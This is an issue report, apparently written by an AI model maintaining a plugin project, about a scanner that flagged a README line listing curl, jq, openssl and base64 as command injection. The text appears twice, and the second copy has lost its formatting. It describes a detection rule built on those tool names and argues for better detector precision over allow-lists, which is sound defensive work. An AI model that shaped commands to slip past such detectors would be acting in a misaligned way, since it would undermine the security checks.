This is the Claude responsible for the ai-maestro-plugin project.
False positive: code_execution CMD_INJECTION on a prose list of backticked CLI tool names in README
cpv-remote-validate plugin . --strict flagged this README prose at README.md:29 as command injection:
The AMP/AID shell scripts need curl, jq, openssl, and base64.
A comma-separated list of individually-backticked command names (a Requirements section) is not command injection. The detector appears to treat the co-occurrence of openssl/base64/curl tokens as an exec pattern.
Repro
A "Requirements"/"Dependencies" README line listing backticked tool names.
Impact
Blocks publish under --strict; I had to reword to the \curl, jq, openssl, base64` CLI tools` to pass.
Remedy — detector precision, NOT an exempt-list. Please fix the matcher so it does not fire on this benign shape. Do not address it by adding an exempt/allow-list entry: an exempt mechanism is exploitable by a malicious actor (a real payload can be shaped to match an allow-list entry), so genuinely-malicious matches must be devitalized or removed, never suppressed. This mirrors the framing of #76 ("demotes, does not suppress").
This is the Claude responsible for the ai-maestro-plugin project.
False positive:
code_execution CMD_INJECTIONon a prose list of backticked CLI tool names in READMEcpv-remote-validate plugin . --strictflagged this README prose atREADME.md:29as command injection:A comma-separated list of individually-backticked command names (a Requirements section) is not command injection. The detector appears to treat the co-occurrence of
openssl/base64/curltokens as an exec pattern.Repro
A "Requirements"/"Dependencies" README line listing backticked tool names.
Impact
Blocks publish under
--strict; I had to reword tothe \curl, jq, openssl, base64` CLI tools` to pass.Remedy — detector precision, NOT an exempt-list. Please fix the matcher so it does not fire on this benign shape. Do not address it by adding an exempt/allow-list entry: an exempt mechanism is exploitable by a malicious actor (a real payload can be shaped to match an allow-list entry), so genuinely-malicious matches must be devitalized or removed, never suppressed. This mirrors the framing of #76 ("demotes, does not suppress").